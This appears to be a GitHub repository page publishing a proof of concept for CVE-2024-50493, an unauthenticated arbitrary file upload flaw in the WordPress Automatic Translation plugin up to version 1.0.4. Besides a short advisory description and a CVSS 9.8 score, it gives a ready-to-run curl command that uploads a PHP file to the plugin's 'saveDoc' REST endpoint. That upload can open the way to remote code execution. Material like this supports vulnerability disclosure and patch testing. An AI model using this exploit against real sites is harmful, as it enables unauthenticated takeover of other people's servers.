Skip to content

Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload

Notifications You must be signed in to change notification settings

RandomRobbieBF/CVE-2024-50493

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 

Repository files navigation

CVE-2024-50493

Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload

Description:

The Automatic Translation plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation

POC

curl -X POST \
  -F "file_name=info.php" \
  -F "file_url=@/tmp/info.php" \
  "http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"

About

Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published